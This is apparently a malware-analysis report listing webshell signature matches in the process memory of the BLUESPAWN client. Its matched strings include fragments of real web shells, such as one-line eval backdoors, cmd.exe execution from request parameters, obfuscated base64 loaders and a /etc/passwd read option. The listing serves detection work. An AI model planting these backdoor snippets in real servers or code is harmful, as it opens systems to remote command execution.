Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_php_s_u | Web Shell - file s-u.php | Florian Roth | - 0x2d7329:$s6: <a href="?act=do"><font color="red">Go Execute</font></a></b><br /><textarea
- 0x33bfce:$s6: <a href="?act=do"><font color="red">Go Execute</font></a></b><br /><textarea
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_phpshell_2_1_config | Web Shell - file config.php | Florian Roth | - 0x2d74bd:$s1: ; (choose good passwords!). Add uses as simple 'username = "password"' lines.
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_EFSO_2 | Web Shell - file EFSO_2.asp | Florian Roth | - 0x2d764a:$s0: %8@#@&P~,P,PP,MV~4BP^~,NS~m~PXc3,_PWbSPU W~~[u3Fffs~/%@#@&~~,PP~~,M!PmS,4S,mBPNB
- 0x33c1e7:$s0: %8@#@&P~,P,PP,MV~4BP^~,NS~m~PXc3,_PWbSPU W~~[u3Fffs~/%@#@&~~,PP~~,M!PmS,4S,mBPNB
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_up | Web Shell - file up.jsp | Florian Roth | - 0x2d77d1:$s9: // BUG: Corta el fichero si es mayor de 640Ks
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_NetworkFileManagerPHP | Web Shell - file NetworkFileManagerPHP.php | Florian Roth | - 0x2d7957:$s9: echo "<br><center>All the data in these tables:<br> ".$tblsv." were putted
- 0x33c3ec:$s9: echo "<br><center>All the data in these tables:<br> ".$tblsv." were putted
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Server_Variables | Web Shell - file Server Variables.asp | Florian Roth | - 0x2d7af3:$s7: <% For Each Vars In Request.ServerVariables %>
- 0x2d7b2e:$s9: Variable Name</B></font></p>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_caidao_shell_ice_2 | Web Shell - file ice.php | Florian Roth | - 0x2d7c8e:$s0: <?php ${${eval($_POST[ice])}};?>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_caidao_shell_mdb | Web Shell - file mdb.asp | Florian Roth | - 0x2d7df0:$s1: <% execute request("ice")%>a
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_guige | Web Shell - file guige.jsp | Florian Roth | - 0x2d7f4a:$s0: if(damapath!=null &&!damapath.equals("")&&content!=null
- 0x33c7c5:$s0: if(damapath!=null &&!damapath.equals("")&&content!=null
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_phpspy2010 | Web Shell - file phpspy2010.php | Florian Roth | - 0x2d80c4:$s3: eval(gzinflate(base64_decode(
- 0x2e121b:$s3: eval(gzinflate(base64_decode(
- 0x2e263d:$s3: eval(gzinflate(base64_decode(
- 0x2f3b7b:$s3: eval(gzinflate(base64_decode(
- 0x2f54c3:$s3: eval(gzinflate(base64_decode(
- 0x305406:$s3: eval(gzinflate(base64_decode(
- 0x307e75:$s3: eval(gzinflate(base64_decode(
- 0x309c70:$s3: eval(gzinflate(base64_decode(
- 0x33c8bb:$s3: eval(gzinflate(base64_decode(
- 0x342b7a:$s3: eval(gzinflate(base64_decode(
- 0x343912:$s3: eval(gzinflate(base64_decode(
- 0x34f3cd:$s3: eval(gzinflate(base64_decode(
- 0x3506b7:$s3: eval(gzinflate(base64_decode(
- 0x35c2ad:$s3: eval(gzinflate(base64_decode(
- 0x35e30e:$s3: eval(gzinflate(base64_decode(
- 0x35f97f:$s3: eval(gzinflate(base64_decode(
- 0x2d80ee:$s5: //angel
- 0x2d8102:$s8: $admin['cookiedomain'] = '';
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_ice | Web Shell - file ice.asp | Florian Roth | - 0x2d8257:$s0: D,'PrjknD,J~[,EdnMP[,-4;DS6@#@&VKobx2ldd,'~JhC
- 0x33c9b6:$s0: D,'PrjknD,J~[,EdnMP[,-4;DS6@#@&VKobx2ldd,'~JhC
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_drag_system | Web Shell - file system.jsp | Florian Roth | - 0x2d83c5:$s9: String sql = "SELECT * FROM DBA_TABLES WHERE TABLE_NAME not like '%$%' and num_
- 0x33caa0:$s9: String sql = "SELECT * FROM DBA_TABLES WHERE TABLE_NAME not like '%$%' and num_
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_DarkBlade1_3_asp_indexx | Web Shell - file indexx.asp | Florian Roth | - 0x2d8560:$s3: Const strs_toTransform="command|Radmin|NTAuThenabled|FilterIp|IISSample|PageCou
- 0x33cbb7:$s3: Const strs_toTransform="command|Radmin|NTAuThenabled|FilterIp|IISSample|PageCou
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_phpshell3 | Web Shell - file phpshell3.php | Florian Roth | - 0x2d86f0:$s2: <input name="nounce" type="hidden" value="<?php echo $_SESSION['nounce'];
- 0x33ccc3:$s2: <input name="nounce" type="hidden" value="<?php echo $_SESSION['nounce'];
- 0x2d8746:$s5: <p>Username: <input name="username" type="text" value="<?php echo $userna
- 0x33cd0f:$s5: <p>Username: <input name="username" type="text" value="<?php echo $userna
- 0x2d879c:$s7: $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_hsxa | Web Shell - file hsxa.jsp | Florian Roth | - 0x2d8914:$s0: <%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="ja
- 0x2e09d0:$s0: <%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="ja
- 0x33ce4f:$s0: <%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="ja
- 0x3425fe:$s0: <%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="ja
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_utils | Web Shell - file utils.jsp | Florian Roth | - 0x2d8a9c:$s0: ResultSet r = c.getMetaData().getTables(null, null, "%", t);
- 0x2d8ae5:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x2dfae5:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x2e29fa:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x33cf92:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x341b97:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x343b95:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_01 | Web Shell - file 01.asp | Florian Roth | - 0x2d8c67:$s0: <%eval request("pass")%>
- 0x2db447:$s0: <%eval request("pass")%>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_404 | Web Shell - file 404.asp | Florian Roth | - 0x2d8db8:$s0: lFyw6pd^DKV^4CDRWmmnO1GVKDl:y& f+2
- 0x33d15d:$s0: lFyw6pd^DKV^4CDRWmmnO1GVKDl:y& f+2
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshell_cnseay02_1 | Web Shell - file webshell-cnseay02-1.php | Florian Roth | - 0x2d8f2f:$s0: (93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU
- 0x33d250:$s0: (93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_php_fbi | Web Shell - file fbi.php | Florian Roth | - 0x2d90b8:$s7: erde types','Getallen','Datum en tijd','Tekst','Binaire gegevens','Netwerk','Geo
- 0x33d355:$s7: erde types','Getallen','Datum en tijd','Tekst','Binaire gegevens','Netwerk','Geo
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_B374kPHP_B374k | Web Shell - file B374k.php | Florian Roth | - 0x2d924a:$s0: Http://code.google.com/p/b374k-shell
- 0x2d927b:$s1: $_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'
- 0x33d48a:$s1: $_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'
- 0x2d92d7:$s3: Jayalah Indonesiaku & Lyke @ 2013
- 0x2d9305:$s4: B374k Vip In Beautify Just For Self
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_cmd_asp_5_1 | Web Shell - file cmd-asp-5.1.asp | Florian Roth | - 0x2d946d:$s9: Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &
- 0x2fa4a1:$s9: Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_php_dodo_zip | Web Shell - file zip.php | Florian Roth | - 0x2d95e7:$s0: $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x
- 0x33d6da:$s0: $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x
- 0x2d9641:$s3: $datastr = "\x50\x4b\x03\x04\x0a
- 0x33d72a:$s3: $datastr = "\x50\x4b\x03\x04\x0a
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_aZRaiLPhp_v1_0 | Web Shell - file aZRaiLPhp v1.0.php | Florian Roth | - 0x2d97cc:$s5: echo " <font color='#0000FF'>CHMODU ".substr(base_convert(@fileperms($
- 0x33d831:$s5: echo " <font color='#0000FF'>CHMODU ".substr(base_convert(@fileperms($
- 0x2d981f:$s7: echo "<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo
- 0x33d87a:$s7: echo "<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_php_list | Web Shell - file list.php | Florian Roth | - 0x2d99a9:$s1: // list.php = Directory & File Listing
- 0x2d99dc:$s2: echo "( ) <a href=?file=" . $fichero . "/" . $filename . ">" . $filena
- 0x33d9a9:$s2: echo "( ) <a href=?file=" . $fichero . "/" . $filename . ">" . $filena
- 0x2d9a33:$s9: // by: The Dark Raver
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_ironshell | Web Shell - file ironshell.php | Florian Roth | - 0x2d9b89:$s4: print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."
- 0x33dac8:$s4: print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."
- 0x2d9bcf:$s8: print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&di
- 0x33db04:$s8: print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&di
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_caidao_shell_404 | Web Shell - file 404.php | Florian Roth | - 0x2d9d50:$s0: <?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('St
- 0x33dc01:$s0: <?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('St
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_ASP_aspydrv | Web Shell - file aspydrv.asp | Florian Roth | - 0x2d9ee1:$s3: <%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thi
- 0x33dd0e:$s3: <%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thi
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_web | Web Shell - file web.jsp | Florian Roth | - 0x2da06a:$s0: <%@page import="java.io.*"%><%@page import="java.net.*"%><%String t=request.
- 0x33de13:$s0: <%@page import="java.io.*"%><%@page import="java.net.*"%><%String t=request.
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_mysqlwebsh | Web Shell - file mysqlwebsh.php | Florian Roth | - 0x2da1f9:$s3: <TR><TD bgcolor="<? echo (!$CONNECT && $action == "chparam")?"#660000":"#
- 0x33df1e:$s3: <TR><TD bgcolor="<? echo (!$CONNECT && $action == "chparam")?"#660000":"#
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jspShell | Web Shell - file jspShell.jsp | Florian Roth | - 0x2da382:$s0: <input type="checkbox" name="autoUpdate" value="AutoUpdate" on
- 0x33e023:$s0: <input type="checkbox" name="autoUpdate" value="AutoUpdate" on
- 0x2da3cd:$s1: onblur="document.shell.autoUpdate.checked= this.oldValue;
- 0x33e064:$s1: onblur="document.shell.autoUpdate.checked= this.oldValue;
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Dx_Dx | Web Shell - file Dx.php | Florian Roth | - 0x2da53c:$s1: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x2f5ee8:$s1: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x2f9215:$s1: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x33e14f:$s1: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x350e36:$s1: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x3534f7:$s1: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x2da593:$s9: class=linelisting><nobr>POST (php eval)</td><
- 0x2f928c:$s9: class=linelisting><nobr>POST (php eval)</td><
- 0x33e19c:$s9: class=linelisting><nobr>POST (php eval)</td><
- 0x353564:$s9: class=linelisting><nobr>POST (php eval)</td><
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_ntdaddy | Web Shell - file ntdaddy.asp | Florian Roth | - 0x2da701:$s9: if FP = "RefreshFolder" or
- 0x33e286:$s9: if FP = "RefreshFolder" or
- 0x2da72e:$s10: request.form("cmdOption")="DeleteFolder"
- 0x33e2aa:$s10: request.form("cmdOption")="DeleteFolder"
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_MySQL_Web_Interface_Version_0_8 | Web Shell - file MySQL Web Interface Version 0.8.php | Florian Roth | - 0x2da8c5:$s2: href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>
- 0x33e3bd:$s2: href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_elmaliseker_2 | Web Shell - file elmaliseker.asp | Florian Roth | - 0x2daa5a:$s1: <td<%if (FSO.GetExtensionName(path & "\" & oFile.Name)="lnk") or (FSO.GetEx
- 0x33e4ce:$s1: <td<%if (FSO.GetExtensionName(path & "\" & oFile.Name)="lnk") or (FSO.GetEx
- 0x2daab2:$s6: <input type=button value=Save onclick="EditorCommand('Save')"> <input type=but
- 0x33e51c:$s6: <input type=button value=Save onclick="EditorCommand('Save')"> <input type=but
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_ASP_RemExp | Web Shell - file RemExp.asp | Florian Roth | - 0x2dac3f:$s0: <td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href= "<%=Reques
- 0x318ff0:$s0: <td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href= "<%=Reques
- 0x33e625:$s0: <td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href= "<%=Reques
- 0x36a87d:$s0: <td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href= "<%=Reques
- 0x2dac97:$s1: Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal
- 0x33e673:$s1: Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_list1 | Web Shell - file list1.jsp | Florian Roth | - 0x2dae24:$s1: case 's':ConnectionDBM(out,encodeChange(request.getParameter("drive
- 0x33e77c:$s1: case 's':ConnectionDBM(out,encodeChange(request.getParameter("drive
- 0x2dae74:$s9: return "<a href=\"javascript:delFile('"+folderReplace(file)+"')\"
- 0x33e7c2:$s9: return "<a href=\"javascript:delFile('"+folderReplace(file)+"')\"
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_phpkit_1_0_odd | Web Shell - file odd.php | Florian Roth | - 0x2daff5:$s0: include('php://input');
- 0x2dc63e:$s0: include('php://input');
- 0x2db019:$s1: // No eval() calls, no system() calls, nothing normally seen as malicious.
- 0x2db070:$s2: ini_set('allow_url_include, 1'); // Allow url inclusion in this script
- 0x2dc662:$s2: ini_set('allow_url_include, 1'); // Allow url inclusion in this script
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_123 | Web Shell - file 123.jsp | Florian Roth | - 0x2db1ef:$s0: <font color="blue">??????????????????:</font><input type="text" size="7
- 0x33ea21:$s0: <font color="blue">??????????????????:</font><input type="text" size="7
- 0x2d5d3b:$s3: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x2db243:$s3: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x2dfe50:$s3: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x33b0f8:$s3: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x33ea6b:$s3: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x341df0:$s3: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x2db299:$s9: <input type="submit" name="btnSubmit" value="Upload">
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_1 | Web Shell - file 1.asp | Florian Roth | - 0x2db407:$s4: !22222222222222222222222222222222222222222222222222
- 0x2d8c67:$s8: <%eval request("pass")%>
- 0x2db447:$s8: <%eval request("pass")%>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_ASP_tool | Web Shell - file tool.asp | Florian Roth | - 0x2db59a:$s0: Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """
- 0x33eca6:$s0: Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """
- 0x2db5ee:$s3: Response.Write "<tr><td><font face='arial' size='2'><b><DIR> <a href='"
- 0x33ecf0:$s3: Response.Write "<tr><td><font face='arial' size='2'><b><DIR> <a href='"
- 0x2db649:$s9: Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javas
- 0x33ed41:$s9: Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javas
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_cmd_win32 | Web Shell - file cmd_win32.jsp | Florian Roth | - 0x2db7d3:$s0: Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParam
- 0x33ee47:$s0: Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParam
- 0x2db826:$s1: <FORM METHOD="POST" NAME="myform" ACTION="">
- 0x2df6e0:$s1: <FORM METHOD="POST" NAME="myform" ACTION="">
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_jshell | Web Shell - file jshell.jsp | Florian Roth | - 0x2db991:$s0: kXpeW["
- 0x2db9a5:$s4: [7b:g0W@W<
- 0x2db9bc:$s5: b:gHr,g<
- 0x2db9d1:$s8: RhV0W@W<
- 0x2db9e6:$s9: S_MR(u7b
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_ASP_zehir4 | Web Shell - file zehir4.asp | Florian Roth | - 0x2dbb2d:$s9: Response.Write "<a href='"&dosyaPath&"?status=7&Path="&Path&"/
- 0x33f067:$s9: Response.Write "<a href='"&dosyaPath&"?status=7&Path="&Path&"/
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_wsb_idc | Web Shell - file idc.php | Florian Roth | - 0x2dbca4:$s1: if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass)
- 0x2dbceb:$s3: {eval($_GET['idc']);}
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_cpg_143_incl_xpl | Web Shell - file cpg_143_incl_xpl.php | Florian Roth | - 0x2dbe4f:$s3: $data="username=".urlencode($USER)."&password=".urlencode($PA
- 0x33f277:$s3: $data="username=".urlencode($USER)."&password=".urlencode($PA
- 0x2dbe99:$s5: fputs($sun_tzu,"<?php echo \"Hi Master!\";ini_set(\"max_execution_time
- 0x33f2b7:$s5: fputs($sun_tzu,"<?php echo \"Hi Master!\";ini_set(\"max_execution_time
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_mumaasp_com | Web Shell - file mumaasp.com.asp | Florian Roth | - 0x2dc024:$s0: &9K_)P82ai,A}I92]R"q!C:RZ}S6]=PaTTR
- 0x33f3be:$s0: &9K_)P82ai,A}I92]R"q!C:RZ}S6]=PaTTR
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_php_404 | Web Shell - file 404.php | Florian Roth | - 0x2dc180:$s0: $pass = md5(md5(md5($pass)));
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshell_cnseay_x | Web Shell - file webshell-cnseay-x.php | Florian Roth | - 0x2dc2ee:$s9: $_F_F.='_'.$_P_P[5].$_P_P[20].$_P_P[13].$_P_P[2].$_P_P[19].$_P_P[8].$_P_
- 0x33f580:$s9: $_F_F.='_'.$_P_P[5].$_P_P[20].$_P_P[13].$_P_P[2].$_P_P[19].$_P_P[8].$_P_
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_up | Web Shell - file up.asp | Florian Roth | - 0x2dc46d:$s0: Pos = InstrB(BoundaryPos,RequestBin,getByteString("Content-Dispositio
- 0x33f67b:$s0: Pos = InstrB(BoundaryPos,RequestBin,getByteString("Content-Dispositio
- 0x2dc4bf:$s1: ContentType = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_phpkit_0_1a_odd | Web Shell - file odd.php | Florian Roth | - 0x2daff5:$s1: include('php://input');
- 0x2dc63e:$s1: include('php://input');
- 0x2db070:$s3: ini_set('allow_url_include, 1'); // Allow url inclusion in this script
- 0x2dc662:$s3: ini_set('allow_url_include, 1'); // Allow url inclusion in this script
- 0x2dc6b5:$s4: // uses include('php://input') to execute arbritary code
- 0x2dc6fa:$s5: // php://input based backdoor
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_ASP_cmd | Web Shell - file cmd.asp | Florian Roth | - 0x2d63c8:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x2dc850:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x2e1d7f:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x309fdf:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x3171c1:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PHP_Shell_x3 | Web Shell - file PHP Shell.php | Florian Roth | - 0x2dc9d5:$s4: <?php echo buildUrl("<font color=\"navy\">[
- 0x2defc2:$s4: <?php echo buildUrl("<font color=\"navy\">[
- 0x33fa2f:$s4: <?php echo buildUrl("<font color=\"navy\">[
- 0x3413c8:$s4: <?php echo buildUrl("<font color=\"navy\">[
- 0x2dca19:$s6: echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input
- 0x2fa7b3:$s6: echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input
- 0x33fa69:$s6: echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input
- 0x35456b:$s6: echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input
- 0x2dca6d:$s9: if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset(
- 0x33fab3:$s9: if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset(
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PHP_g00nv13 | Web Shell - file g00nv13.php | Florian Roth | - 0x2dcbfa:$s1: case "zip": case "tar": case "rar": case "gz": case "cab": cas
- 0x33fbbc:$s1: case "zip": case "tar": case "rar": case "gz": case "cab": cas
- 0x2dcc45:$s4: if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_p
- 0x33fbfd:$s4: if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_p
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_php_h6ss | Web Shell - file h6ss.php | Florian Roth | - 0x2dcdcc:$s0: <?php eval(gzuncompress(base64_decode("
- 0x33fd00:$s0: <?php eval(gzuncompress(base64_decode("
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_zx | Web Shell - file zx.jsp | Florian Roth | - 0x2dcf2a:$s0: if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.g
- 0x33fdda:$s0: if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.g
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Ani_Shell | Web Shell - file Ani-Shell.php | Florian Roth | - 0x2dd0b9:$s0: $Python_CODE = "I
- 0x33fee5:$s0: $Python_CODE = "I
- 0x2dd0d7:$s6: $passwordPrompt = "\n=================================================
- 0x33fef9:$s6: $passwordPrompt = "\n=================================================
- 0x2dd12a:$s7: fputs ($sockfd ,"\n===============================================
- 0x33ff42:$s7: fputs ($sockfd ,"\n===============================================
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_k8cmd | Web Shell - file k8cmd.jsp | Florian Roth | - 0x2dd2a9:$s2: if(request.getSession().getAttribute("hehe").toString().equals("hehe"))
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_cmd | Web Shell - file cmd.jsp | Florian Roth | - 0x2dd429:$s6: out.println("Command: " + request.getParameter("cmd") + "<BR>");
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_k81 | Web Shell - file k81.jsp | Florian Roth | - 0x2dd5a2:$s1: byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);
- 0x2dd5f3:$s9: if(cmd.equals("Szh0ZWFt")){out.print("[S]"+dir+"[E]");}
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_ASP_zehir | Web Shell - file zehir.asp | Florian Roth | - 0x2dd767:$s9: Response.Write "<font face=wingdings size=3><a href='"&dosyaPath&"?status=18&
- 0x340365:$s9: Response.Write "<font face=wingdings size=3><a href='"&dosyaPath&"?status=18&
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Worse_Linux_Shell | Web Shell - file Worse Linux Shell.php | Florian Roth | - 0x2dd905:$s0: system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD
- 0x34047f:$s0: system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_zacosmall | Web Shell - file zacosmall.php | Florian Roth | - 0x2dda7d:$s0: if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>
- 0x340573:$s0: if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit | Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php | Florian Roth | - 0x2ddc66:$s1: <option value="cat /etc/passwd">/etc/passwd</option>
- 0x306b3e:$s1: <option value="cat /etc/passwd">/etc/passwd</option>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_redirect | Web Shell - file redirect.asp | Florian Roth | - 0x2dddd9:$s7: var flag = "?txt=" + (document.getElementById("dl").checked ? "2":"1"
- 0x3407c7:$s7: var flag = "?txt=" + (document.getElementById("dl").checked ? "2":"1"
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_cmdjsp | Web Shell - file cmdjsp.jsp | Florian Roth | - 0x2ddf5e:$s5: <FORM METHOD=GET ACTION='cmdjsp.jsp'>
- 0x2e13c2:$s5: <FORM METHOD=GET ACTION='cmdjsp.jsp'>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Java_Shell | Web Shell - file Java Shell.jsp | Florian Roth | - 0x2de0c6:$s4: public JythonShell(int columns, int rows, int scrollback) {
- 0x2de10e:$s9: this(null, Py.getSystemState(), columns, rows, scrollback);
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_1d | Web Shell - file 1d.asp | Florian Roth | - 0x2de280:$s0: +9JkskOfKhUxZJPL~\(mD^W~[,{@#@&EO
- 0x340ad8:$s0: +9JkskOfKhUxZJPL~\(mD^W~[,{@#@&EO
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_IXRbE | Web Shell - file IXRbE.jsp | Florian Roth | - 0x2de3de:$s0: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application
